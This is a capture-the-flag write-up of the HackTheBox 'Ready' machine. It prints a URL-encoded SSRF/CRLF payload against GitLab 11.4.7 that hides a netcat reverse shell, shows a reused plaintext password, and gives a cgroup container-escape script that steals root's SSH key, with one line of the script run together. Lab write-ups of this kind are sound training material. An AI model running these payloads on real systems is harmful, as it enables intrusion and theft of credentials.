Hackthebox - Ready | Shubham Kumar

Summary

Ready, a Linux box created by user bertolis was a medium difficulty box.
Initial foothold was finding a Gitlab instance which was running an old version 11.4.7 which had SSRF and CRLF issue and combining them and redis along with Gitlab workers we can get a RCE.
After we get a shell we find a backup in /opt which contain a gitlab.rb file checking that file without comments we find a SMTP password.
Trying to see if it was used somewhere else we can escalate to root.
But as we are still in docker container of gitlab we had to escape the container.
in the same backup folder we find a docker-compose file which contain that the container is running with privileged flag Googling around we find a way to escape the container

Initial Enumeration

# Nmap 7.80 scan initiated Mon Dec 14 11:33:03 2020 as: nmap -Pn -sC -sV -oN nmap/ready 10.10.10.220
Nmap scan report for 10.10.10.220
Host is up (0.077s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 14 11:33:19 2020 -- 1 IP address (1 host up) scanned in 16.41 seconds

Gitlab (5080)

Opening 5080 we find a gitlab running

seeing a Register, I register and logged myself in

also checking the version by visiting /help we saw it is GitLab Community Edition 11.4.7

Seeing the Version I remember LiveOverflow video about the same version of Gitlab

Written Writeup

We can use that to get a shell as git

1
2

## URL encoded payload
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0d%0a%20%6d%75%6c%74%69%0d%0a%20%73%61%64%64%20%72%65%73%71%75%65%3a%67%69%74%6c%61%62%3a%71%75%65%75%65%73%20%73%79%73%74%65%6d%5f%68%6f%6f%6b%5f%70%75%73%68%0d%0a%20%6c%70%75%73%68%20%72%65%73%71%75%65%3a%67%69%74%6c%61%62%3a%71%75%65%75%65%3a%73%79%73%74%65%6d%5f%68%6f%6f%6b%5f%70%75%73%68%20%22%7b%5c%22%63%6c%61%73%73%5c%22%3a%5c%22%47%69%74%6c%61%62%53%68%65%6c%6c%57%6f%72%6b%65%72%5c%22%2c%5c%22%61%72%67%73%5c%22%3a%5b%5c%22%63%6c%61%73%73%5f%65%76%61%6c%5c%22%2c%5c%22%6f%70%65%6e%28%5c%27%7c%63%61%74%20%2f%66%6c%61%67%20%7c%20%6e%63%20%31%30%2e%31%30%2e%31%34%2e%38%20%34%34%34%34%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%32%33%34%5c%27%29%2e%72%65%61%64%5c%22%5d%2c%5c%22%72%65%74%72%79%5c%22%3a%33%2c%5c%22%71%75%65%75%65%5c%22%3a%5c%22%73%79%73%74%65%6d%5f%68%6f%6f%6b%5f%70%75%73%68%5c%22%2c%5c%22%6a%69%64%5c%22%3a%5c%22%61%64%35%32%61%62%63%35%36%34%31%31%37%33%65%32%31%37%65%62%32%65%35%32%5c%22%2c%5c%22%63%72%65%61%74%65%64%5f%61%74%5c%22%3a%31%35%31%33%37%31%34%34%30%33%2e%38%31%32%32%35%39%34%2c%5c%22%65%6e%71%75%65%75%65%64%5f%61%74%5c%22%3a%31%35%31%33%37%31%34%34%30%33%2e%38%31%32%39%35%36%38%7d%22%0d%0a%20%65%78%65%63%0d%0a%20%65%78%65%63%0d%0a/ssrf.git

(git)

Enumerating the box we see we are in a docker container.

Checking Home we find a user dude which had user.txt which we can grab as it is readable by group

also checking in /opt/ we find a backups directory.

Checking the gitlab.rb file in /opt/backup/gitlab.rb when we grep for everything without a comment we find only one line

1	gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

and when we try to su with that we get a shell as root

Root (Docker)

in the same location we find a docker-compose file

version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16

We see that the container is running with privileged: true

Checking we find a POC to escape that using blog and medium

So I modified the payload to read root id_rsa

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/xecho 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "cat /root/.ssh/id_rsa > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo 0 >> /tmp/cgrp/x/cgroup.procs"

cat /output

Root

using the key we can get root shell on the box and we can read root.txt

and we have pwned Ready 💃